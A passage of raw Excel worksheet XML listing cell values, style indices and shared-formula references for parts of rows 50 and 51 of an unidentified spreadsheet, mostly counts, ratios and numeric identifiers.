      <c r="GL50" s="113">
        <f t="shared" si="43"/>
        <v>3</v>
      </c>
      <c r="GM50" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN50" s="113">
        <f t="shared" si="45"/>
        <v>10</v>
      </c>
      <c r="GO50" s="113">
        <f t="shared" si="46"/>
        <v>6</v>
      </c>
      <c r="GP50" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ50" s="114">
        <f t="shared" si="81"/>
        <v>1</v>
      </c>
      <c r="GR50" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS50" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT50" s="94"/>
      <c r="GU50" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV50" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW50" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF50" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG50" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH50" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI50" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ50" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK50" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL50" s="93">
        <v>1.0</v>
      </c>
      <c r="HM50" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN50" s="93">
        <v>0.0</v>
      </c>
      <c r="HO50" s="93">
        <v>0.0</v>
      </c>
      <c r="HP50" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ50" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR50" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS50" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT50" s="139"/>
      <c r="HU50" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV50" s="119" t="s">
        <v>1028</v>
      </c>
      <c r="HW50" s="119">
        <v>2.0</v>
      </c>
      <c r="HX50" s="119">
        <v>4.0</v>
      </c>
      <c r="HY50" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ50" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA50" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB50" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC50" s="120">
        <v>56610.0</v>
      </c>
      <c r="ID50" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE50" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF50" s="120" t="s">
        <v>1028</v>
      </c>
      <c r="IG50" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH50" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II50" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ50" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK50" s="99">
        <v>1.0</v>
      </c>
      <c r="IL50" s="99">
        <v>0.0</v>
      </c>
      <c r="IM50" s="121">
        <f t="shared" si="93"/>
        <v>0</v>
      </c>
      <c r="IN50" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO50" s="98">
        <v>0.0</v>
      </c>
      <c r="IP50" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ50" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR50" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS50" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT50" s="127"/>
      <c r="IU50" s="127"/>
      <c r="IV50" s="127"/>
      <c r="IW50" s="127"/>
      <c r="IX50" s="127"/>
      <c r="IY50" s="127"/>
      <c r="IZ50" s="127"/>
      <c r="JA50" s="127"/>
      <c r="JB50" s="127"/>
      <c r="JC50" s="127"/>
      <c r="JD50" s="127"/>
      <c r="JE50" s="127"/>
      <c r="JF50" s="127"/>
      <c r="JG50" s="127"/>
      <c r="JH50" s="127"/>
      <c r="JI50" s="127"/>
      <c r="JJ50" s="127"/>
      <c r="JK50" s="127"/>
      <c r="JL50" s="127"/>
      <c r="JM50" s="127"/>
      <c r="JN50" s="127"/>
      <c r="JO50" s="127"/>
      <c r="JP50" s="127"/>
      <c r="JQ50" s="127"/>
      <c r="JR50" s="127"/>
      <c r="JS50" s="127"/>
      <c r="JT50" s="127"/>
      <c r="JU50" s="127"/>
      <c r="JV50" s="127"/>
      <c r="JW50" s="127"/>
      <c r="JX50" s="127"/>
      <c r="JY50" s="127"/>
      <c r="JZ50" s="127"/>
      <c r="KA50" s="127"/>
      <c r="KB50" s="127"/>
      <c r="KC50" s="127"/>
      <c r="KD50" s="127"/>
      <c r="KE50" s="127"/>
      <c r="KF50" s="127"/>
      <c r="KG50" s="127"/>
      <c r="KH50" s="127"/>
      <c r="KI50" s="127"/>
      <c r="KJ50" s="127"/>
      <c r="KK50" s="127"/>
      <c r="KL50" s="127"/>
      <c r="KM50" s="127"/>
      <c r="KN50" s="127"/>
      <c r="KO50" s="127"/>
      <c r="KP50" s="127"/>
      <c r="KQ50" s="127"/>
      <c r="KR50" s="127"/>
      <c r="KS50" s="127"/>
      <c r="KT50" s="127"/>
      <c r="KU50" s="127"/>
      <c r="KV50" s="127"/>
      <c r="KW50" s="127"/>
      <c r="KX50" s="127"/>
      <c r="KY50" s="127"/>
      <c r="KZ50" s="127"/>
      <c r="LA50" s="127"/>
      <c r="LB50" s="127"/>
      <c r="LC50" s="127"/>
      <c r="LD50" s="127"/>
      <c r="LE50" s="127"/>
      <c r="LF50" s="127"/>
      <c r="LG50" s="127"/>
      <c r="LH50" s="127"/>
      <c r="LI50" s="127"/>
      <c r="LJ50" s="127"/>
      <c r="LK50" s="127"/>
      <c r="LL50" s="127"/>
      <c r="LM50" s="127"/>
      <c r="LN50" s="127"/>
      <c r="LO50" s="127"/>
      <c r="LP50" s="127"/>
      <c r="LQ50" s="127"/>
      <c r="LR50" s="127"/>
      <c r="LS50" s="127"/>
      <c r="LT50" s="127"/>
      <c r="LU50" s="127"/>
      <c r="LV50" s="127"/>
      <c r="LW50" s="127"/>
      <c r="LX50" s="127"/>
      <c r="LY50" s="127"/>
      <c r="LZ50" s="127"/>
      <c r="MA50" s="127"/>
      <c r="MB50" s="127"/>
      <c r="MC50" s="127"/>
      <c r="MD50" s="127"/>
      <c r="ME50" s="127"/>
      <c r="MF50" s="127"/>
      <c r="MG50" s="127"/>
      <c r="MH50" s="127"/>
      <c r="MI50" s="127"/>
      <c r="MJ50" s="127"/>
      <c r="MK50" s="127"/>
      <c r="ML50" s="127"/>
      <c r="MM50" s="127"/>
      <c r="MN50" s="127"/>
      <c r="MO50" s="127"/>
      <c r="MP50" s="127"/>
      <c r="MQ50" s="127"/>
      <c r="MR50" s="127"/>
      <c r="MS50" s="127"/>
      <c r="MT50" s="127"/>
      <c r="MU50" s="127"/>
      <c r="MV50" s="127"/>
      <c r="MW50" s="127"/>
      <c r="MX50" s="127"/>
      <c r="MY50" s="127"/>
      <c r="MZ50" s="127"/>
      <c r="NA50" s="127"/>
      <c r="NB50" s="127"/>
      <c r="NC50" s="127"/>
      <c r="ND50" s="127"/>
      <c r="NE50" s="127"/>
      <c r="NF50" s="127"/>
      <c r="NG50" s="127"/>
      <c r="NH50" s="127"/>
      <c r="NI50" s="127"/>
      <c r="NJ50" s="127"/>
      <c r="NK50" s="127"/>
      <c r="NL50" s="127"/>
      <c r="NM50" s="127"/>
      <c r="NN50" s="127"/>
      <c r="NO50" s="127"/>
      <c r="NP50" s="127"/>
      <c r="NQ50" s="127"/>
      <c r="NR50" s="127"/>
      <c r="NS50" s="127"/>
      <c r="NT50" s="127"/>
      <c r="NU50" s="127"/>
      <c r="NV50" s="127"/>
      <c r="NW50" s="127"/>
      <c r="NX50" s="127"/>
      <c r="NY50" s="127"/>
    </row>
    <row r="51" ht="153.75" customHeight="1">
      <c r="B51" s="89" t="s">
        <v>951</v>
      </c>
      <c r="C51" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D51" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E51" s="90" t="s">
        <v>1040</v>
      </c>
      <c r="F51" s="90" t="s">
        <v>1041</v>
      </c>
      <c r="G51" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H51" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I51" s="92" t="s">
        <v>1042</v>
      </c>
      <c r="J51" s="92" t="s">
        <v>1043</v>
      </c>
      <c r="K51" s="92" t="s">
        <v>1044</v>
      </c>
      <c r="L51" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M51" s="93">
        <v>50.0</v>
      </c>
      <c r="N51" s="93">
        <v>35.0</v>
      </c>
      <c r="O51" s="93">
        <v>0.0</v>
      </c>
      <c r="P51" s="93">
        <v>38.0</v>
      </c>
      <c r="Q51" s="93">
        <f t="shared" si="94"/>
        <v>38</v>
      </c>
      <c r="R51" s="93">
        <v>38.0</v>
      </c>
      <c r="S51" s="93">
        <v>0.0</v>
      </c>
      <c r="T51" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U51" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V51" s="96" t="s">
        <v>1045</v>
      </c>
      <c r="W51" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X51" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y51" s="96" t="s">
        <v>1046</v>
      </c>
      <c r="Z51" s="96" t="s">
        <v>512</v>
      </c>
      <c r="AA51" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB51" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC51" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD51" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE51" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF51" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG51" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH51" s="99" t="s">
        <v>1047</v>
      </c>
      <c r="AI51" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ51" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL51" s="100">
        <v>0.0</v>
      </c>
      <c r="AM51" s="100">
        <v>0.0</v>
      </c>
      <c r="AN51" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP51" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ51" s="100">
        <v>0.0</v>
      </c>
      <c r="AR51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX51" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY51" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ51" s="100">
        <v>0.0</v>
      </c>
      <c r="BA51" s="102">
        <v>50.0</v>
      </c>
      <c r="BB51" s="102">
        <v>0.0</v>
      </c>
      <c r="BC51" s="102">
        <v>0.0</v>
      </c>
      <c r="BD51" s="102">
        <v>0.0</v>
      </c>
      <c r="BE51" s="102">
        <v>0.0</v>
      </c>
      <c r="BF51" s="102">
        <v>0.0</v>
      </c>
      <c r="BG51" s="102">
        <v>0.0</v>
      </c>
      <c r="BH51" s="102">
        <v>0.0</v>
      </c>
      <c r="BI51" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ51" s="102">
        <v>0.0</v>
      </c>
      <c r="BK51" s="102">
        <v>0.0</v>
      </c>
      <c r="BL51" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM51" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN51" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO51" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP51" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ51" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR51" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS51" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT51" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU51" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV51" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW51" s="104" t="s">
        <v>1048</v>
      </c>
      <c r="BX51" s="104">
        <v>8.0</v>
      </c>
      <c r="BY51" s="104">
        <v>85.0</v>
      </c>
      <c r="BZ51" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA51" s="104" t="s">
        <v>1048</v>
      </c>
      <c r="CB51" s="104">
        <v>8.0</v>
      </c>
      <c r="CC51" s="104">
        <v>85.0</v>
      </c>
      <c r="CD51" s="104">
        <v>2016672.0</v>
      </c>
      <c r="CE51" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF51" s="104">
        <f t="shared" si="90"/>
        <v>2016672</v>
      </c>
      <c r="CG51" s="104">
        <v>2016672.0</v>
      </c>
      <c r="CH51" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI51" s="104" t="s">
        <v>1049</v>
      </c>
      <c r="CJ51" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK51" s="104">
        <v>7.0</v>
      </c>
      <c r="CL51" s="104">
        <v>81.0</v>
      </c>
      <c r="CM51" s="105">
        <v>50.0</v>
      </c>
      <c r="CN51" s="105">
        <v>30.0</v>
      </c>
      <c r="CO51" s="105">
        <v>33.0</v>
      </c>
      <c r="CP51" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ51" s="105">
        <v>85.0</v>
      </c>
      <c r="CR51" s="105">
        <v>85.0</v>
      </c>
      <c r="CS51" s="105">
        <v>28.0</v>
      </c>
      <c r="CT51" s="105">
        <v>0.0</v>
      </c>
      <c r="CU51" s="105">
        <v>29.0</v>
      </c>
      <c r="CV51" s="105">
        <v>29.0</v>
      </c>
      <c r="CW51" s="105">
        <v>30.0</v>
      </c>
      <c r="CX51" s="105">
        <v>33.0</v>
      </c>
      <c r="CY51" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ51" s="105">
        <v>85.0</v>
      </c>
      <c r="DA51" s="105">
        <v>85.0</v>
      </c>
      <c r="DB51" s="106">
        <f t="shared" si="15"/>
        <v>0.8571428571</v>
      </c>
      <c r="DC51" s="106">
        <f t="shared" si="16"/>
        <v>0.8571428571</v>
      </c>
      <c r="DD51" s="106">
        <f t="shared" si="17"/>
        <v>0.8</v>
      </c>
      <c r="DE51" s="106">
        <f t="shared" si="18"/>
        <v>0.8684210526</v>
      </c>
      <c r="DF51" s="106">
        <f t="shared" si="19"/>
        <v>0.8684210526</v>
      </c>
      <c r="DG51" s="106">
        <f t="shared" si="20"/>
        <v>0.7631578947</v>
      </c>
      <c r="DH51" s="106">
        <f t="shared" si="21"/>
        <v>2.236842105</v>
      </c>
      <c r="DI51" s="106">
        <f t="shared" si="22"/>
        <v>2.236842105</v>
      </c>
      <c r="DJ51" s="106">
        <f t="shared" si="23"/>
        <v>0.7631578947</v>
      </c>
      <c r="DK51" s="107">
        <f t="shared" si="77"/>
        <v>0.8</v>
      </c>
      <c r="DL51" s="106">
        <f t="shared" si="78"/>
        <v>1</v>
      </c>
      <c r="DM51" s="108" t="s">
        <v>1050</v>
      </c>
      <c r="DN51" s="108">
        <v>15.0</v>
      </c>
      <c r="DO51" s="108">
        <v>205.0</v>
      </c>
      <c r="DP51" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ51" s="108" t="s">
        <v>1050</v>
      </c>
      <c r="DR51" s="108">
        <v>15.0</v>
      </c>
      <c r="DS51" s="108">
        <v>205.0</v>
      </c>
      <c r="DT51" s="108" t="s">
        <v>1051</v>
      </c>
      <c r="DU51" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV51" s="108" t="str">
        <f t="shared" si="91"/>
        <v>2016672, 50447</v>
      </c>
      <c r="DW51" s="108">
        <v>2016672.0</v>
      </c>
      <c r="DX51" s="108">
        <v>50447.0</v>
      </c>
      <c r="DY51" s="108" t="s">
        <v>1052</v>
      </c>
      <c r="DZ51" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA51" s="108">
        <v>13.0</v>
      </c>
      <c r="EB51" s="108">
        <v>148.0</v>
      </c>
      <c r="EC51" s="109">
        <v>50.0</v>
      </c>
      <c r="ED51" s="109">
        <v>30.0</v>
      </c>
      <c r="EE51" s="109">
        <v>34.0</v>
      </c>
      <c r="EF51" s="109">
        <v>120.0</v>
      </c>
      <c r="EG51" s="109">
        <v>85.0</v>
      </c>
      <c r="EH51" s="109">
        <v>196.0</v>
      </c>
      <c r="EI51" s="109">
        <v>28.0</v>
      </c>
      <c r="EJ51" s="109">
        <v>0.0</v>
      </c>
      <c r="EK51" s="109">
        <v>30.0</v>
      </c>
      <c r="EL51" s="109">
        <v>30.0</v>
      </c>
      <c r="EM51" s="109">
        <v>30.0</v>
      </c>
      <c r="EN51" s="109">
        <v>34.0</v>
      </c>
      <c r="EO51" s="109">
        <v>120.0</v>
      </c>
      <c r="EP51" s="109">
        <v>85.0</v>
      </c>
      <c r="EQ51" s="109">
        <v>196.0</v>
      </c>
      <c r="ER51" s="110">
        <f t="shared" si="27"/>
        <v>0.8571428571</v>
      </c>
      <c r="ES51" s="110">
        <f t="shared" si="28"/>
        <v>0.8571428571</v>
      </c>
      <c r="ET51" s="110">
        <f t="shared" si="29"/>
        <v>0.8</v>
      </c>
      <c r="EU51" s="110">
        <f t="shared" si="30"/>
        <v>0.8947368421</v>
      </c>
      <c r="EV51" s="110">
        <f t="shared" si="31"/>
        <v>0.8947368421</v>
      </c>
      <c r="EW51" s="110">
        <f t="shared" si="32"/>
        <v>0.7894736842</v>
      </c>
      <c r="EX51" s="110">
        <f t="shared" si="33"/>
        <v>5.157894737</v>
      </c>
      <c r="EY51" s="110">
        <f t="shared" si="34"/>
        <v>5.157894737</v>
      </c>
      <c r="EZ51" s="110">
        <f t="shared" si="35"/>
        <v>0.7894736842</v>
      </c>
      <c r="FA51" s="110">
        <f t="shared" si="79"/>
        <v>0.8</v>
      </c>
      <c r="FB51" s="110">
        <f t="shared" si="80"/>
        <v>1</v>
      </c>
      <c r="FC51" s="111" t="s">
        <v>1053</v>
      </c>
      <c r="FD51" s="111">
        <v>20.0</v>
      </c>
      <c r="FE51" s="111">
        <v>220.0</v>
      </c>
      <c r="FF51" s="101" t="s">
        <v>423</v>
      </c>
      <c r="FG51" s="111" t="s">
        <v>1054</v>
      </c>
      <c r="FH51" s="111">
        <v>18.0</v>
      </c>
      <c r="FI51" s="111">
        <v>208.0</v>
      </c>
      <c r="FJ51" s="111" t="s">
        <v>1055</v>
      </c>
      <c r="FK51" s="111" t="s">
        <v>423</v>
      </c>
      <c r="FL51" s="111" t="str">
        <f t="shared" si="95"/>
        <v>50447, 2002749, 2002752, 2016672</v>
      </c>
      <c r="FM51" s="111">
        <v>2016672.0</v>
      </c>
      <c r="FN51" s="111" t="s">
        <v>1056</v>
      </c>
      <c r="FO51" s="111" t="s">
        <v>1057</v>
      </c>
      <c r="FP51" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ51" s="111">
        <v>16.0</v>
      </c>
      <c r="FR51" s="111">
        <v>150.0</v>
      </c>
      <c r="FS51" s="112">
        <v>50.0</v>
      </c>
      <c r="FT51" s="112">
        <v>32.0</v>
      </c>
      <c r="FU51" s="112">
        <v>43.0</v>
      </c>
      <c r="FV51" s="112">
        <v>120.0</v>
      </c>
      <c r="FW51" s="112">
        <v>100.0</v>
      </c>
      <c r="FX51" s="112">
        <v>199.0</v>
      </c>
      <c r="FY51" s="112">
        <v>30.0</v>
      </c>
      <c r="FZ51" s="112">
        <v>0.0</v>
      </c>
      <c r="GA51" s="112">
        <v>32.0</v>
      </c>
      <c r="GB51" s="112">
        <v>32.0</v>
      </c>
      <c r="GC51" s="112">
        <v>31.0</v>
      </c>
      <c r="GD51" s="112">
        <v>35.0</v>
      </c>
      <c r="GE51" s="112">
        <v>120.0</v>
      </c>
      <c r="GF51" s="112">
        <v>88.0</v>
      </c>
      <c r="GG51" s="112">
        <v>199.0</v>
      </c>
      <c r="GH51" s="113">
        <f t="shared" si="39"/>
        <v>0.9142857143</v>
      </c>
      <c r="GI51" s="113">
        <f t="shared" si="40"/>
        <v>0.8857142857</v>
      </c>
      <c r="GJ51" s="113">
        <f t="shared" si="41"/>
        <v>0.8571428571</v>
      </c>
      <c r="GK51" s="113">
        <f t="shared" si="42"/>
        <v>1.131578947</v>
      </c>
      <c r="GL51" s="113">
        <f t="shared" si="43"/>
        <v>0.9210526316</v>
      </c>
      <c r="GM51" s="113">
        <f t="shared" si="44"/>
        <v>0.8421052632</v>
      </c>
      <c r="GN51" s="113">
        <f t="shared" si="45"/>
        <v>5.236842105</v>
      </c>
      <c r="GO51" s="113">
        <f t="shared" si="46"/>
        <v>5.236842105</v>
      </c>
      <c r="GP51" s="113">
        <f t="shared" si="47"/>
        <v>0.8421052632</v>
      </c>
      <c r="GQ51" s="114">
        <f t="shared" si="81"/>
        <v>0.8571428571</v>
      </c>
      <c r="GR51" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS51" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT51" s="94" t="s">
        <v>1058</v>
      </c>
      <c r="GU51" s="116">
        <v>15621.0</v>
      </c>
      <c r="GV51" s="116">
        <v>1.0</v>
      </c>
      <c r="GW51" s="116">
        <v>37.0</v>
      </c>
      <c r="GX51" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY51" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ51" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA51" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB51" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC51" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD51" s="131">
        <v>15621.0</v>
      </c>
      <c r="HE51" s="131">
        <v>15621.0</v>
      </c>
      <c r="HF51" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG51" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH51" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI51" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ51" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK51" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL51" s="93">
        <v>50.0</v>
      </c>
      <c r="HM51" s="93">
        <f t="shared" si="83"/>
        <v>35</v>
      </c>
      <c r="HN51" s="93">
        <v>35.0</v>
      </c>
      <c r="HO51" s="93">
        <v>0.0</v>
      </c>
      <c r="HP51" s="93">
        <v>35.0</v>
      </c>
      <c r="HQ51" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR51" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS51" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT51" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU51" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV51" s="119" t="s">
        <v>1059</v>
      </c>
      <c r="HW51" s="119">
        <v>6.0</v>
      </c>
      <c r="HX51" s="119">
        <v>225.0</v>
      </c>
      <c r="HY51" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ51" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA51" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB51" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC51" s="120" t="s">
        <v>1060</v>
      </c>
      <c r="ID51" s="120" t="s">
        <v>1061</v>
      </c>
      <c r="IE51" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF51" s="120">
        <v>14984.0</v>
      </c>
      <c r="IG51" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH51" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II51" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ51" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK51" s="99">
        <v>50.0</v>
      </c>
      <c r="IL51" s="99">
        <v>35.0</v>
      </c>
      <c r="IM51" s="121">
        <f t="shared" si="93"/>
        <v>35</v>
      </c>
      <c r="IN51" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO51" s="98">
        <v>35.0</v>
      </c>
      <c r="IP51" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ51" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR51" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS51" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT51" s="127"/>
      <c r="IU51" s="127"/>
      <c r="IV51" s="127"/>
      <c r="IW51" s="127"/>
      <c r="IX51" s="127"/>
      <c r="IY51" s="127"/>
      <c r="IZ51" s="127"/>
      <c r="JA51" s="127"/>
      <c r="JB51" s="127"/>
      <c r="JC51" s="127"/>
      <c r="JD51" s="127"/>
      <c r="JE51" s="127"/>
      <c r="JF51" s="127"/>
      <c r="JG51" s="127"/>
      <c r="JH51" s="127"/>
      <c r="JI51" s="127"/>
      <c r="JJ51" s="127"/>
      <c r="JK51" s="127"/>
      <c r="JL51" s="127"/>
      <c r="JM51" s="127"/>
      <c r="JN51" s="127"/>
      <c r="JO51" s="127"/>
      <c r="JP51" s="127"/>
      <c r="JQ51" s="127"/>
      <c r="JR51" s="127"/>
      <c r="JS51" s="127"/>
      <c r="JT51" s="127"/>
      <c r="JU51" s="127"/>
      <c r="JV51" s="127"/>
      <c r="JW51" s="127"/>
      <c r="JX51" s="127"/>
      <c r="JY51" s="127"/>
      <c r="JZ51" s="127"/>
      <c r="KA51" s="127"/>
      <c r="KB51" s="127"/>
      <c r="KC51" s="127"/>
      <c r="KD51" s="127"/>
      <c r="KE51" s="127"/>
      <c r="KF51" s="127"/>
      <c r="KG51" s="127"/>
      <c r="KH51" s="127"/>
      <c r="KI51" s="127"/>
      <c r="KJ51" s="127"/>
      <c r="KK51" s="127"/>
      <c r="KL51" s="127"/>
      <c r="KM51" s="127"/>
      <c r="KN51" s="127"/>
      <c r="KO51" s="127"/>
      <c r="KP51" s="127"/>
      <c r="KQ51" s="127"/>
      <c r="KR51" s="127"/>
      <c r="KS51" s="127"/>
      <c r="KT51" s="127"/>
      <c r="KU51" s="127"/>
      <c r="KV51" s="127"/>
      <c r="KW51" s="127"/>
      <c r="KX51" s="127"/>
      <c r="KY51" s="127"/>
      <c r="KZ51" s="127"/>
      <c r="LA51" s="127"/>
      <c r="LB51" s="127"/>
      <c r="LC51" s="127"/>
      <c r="LD51" s="127"/>
      <c r="LE51" s="127"/>
      <c r="LF51" s="127"/>
      <c r="LG51" s="127"/>
      <c r="LH51" s="127"/>
      <c r="LI51" s="127"/>
      <c r="LJ51" s="127"/>
      <c r="LK51" s="127"/>
      <c r="LL51" s="127"/>
      <c r="LM51" s="127"/>
      <c r="LN51" s="127"/>
      <c r="LO51" s="127"/>
      <c r="LP51" s="127"/>
      <c r="LQ51" s="127"/>
      <c r="LR51" s="127"/>
      <c r="LS51" s="127"/>
      <c r="LT51" s="127"/>
      <c r="LU51" s="127"/>
      <c r="LV51" s="127"/>
      <c r="LW51" s="127"/>
      <c r="LX51" s="127"/>
      <c r="LY51" s="127"/>
      <c r="LZ51" s="127"/>
      <c r="MA51" s="127"/>
      <c r="MB51" s="127"/>
      <c r="MC51" s="127"/>
      <c r="MD51" s="127"/>
      <c r="ME51" s="127"/>
      <c r="MF51" s="127"/>
      <c r="MG51" s="127"/>
      <c r="MH51" s="127"/>
      <c r="MI51" s="127"/>
      <c r="MJ51" s="127"/>
      <c r="MK51" s="127"/>
      <c r="ML51" s="127"/>
      <c r="MM51" s="127"/>
      <c r="MN51" s="127"/>
      <c r="MO51" s="127"/>
      <c r="MP51" s="127"/>
      <c r="MQ51" s="127"/>
      <c r="MR51" s="127"/>
      <c r="MS51" s="127"/>
      <c r="MT51" s="127"/>
      <c r="MU51" s="127"/>
      <c r="MV51" s="127"/>
      <c r="MW51" s="127"/>
      <c r="MX51" s="127"/>
      <c r="MY51" s="127"/>
      <c r="MZ51" s="127"/>
      <c r="NA51" s="127"/>
      <c r="NB51" s="127"/>
      <c r="NC51" s="127"/>
      <c r="ND51" s="127"/>
      <c r="NE51" s="127"/>
      <c r="NF51" s="127"/>
      <c r="NG51" s="127"/>
      <c r="NH51" s="127"/>
      <c r="NI51" s="127"/>
      <c r="NJ51" s="127"/>
      <c r="NK51" s="127"/>
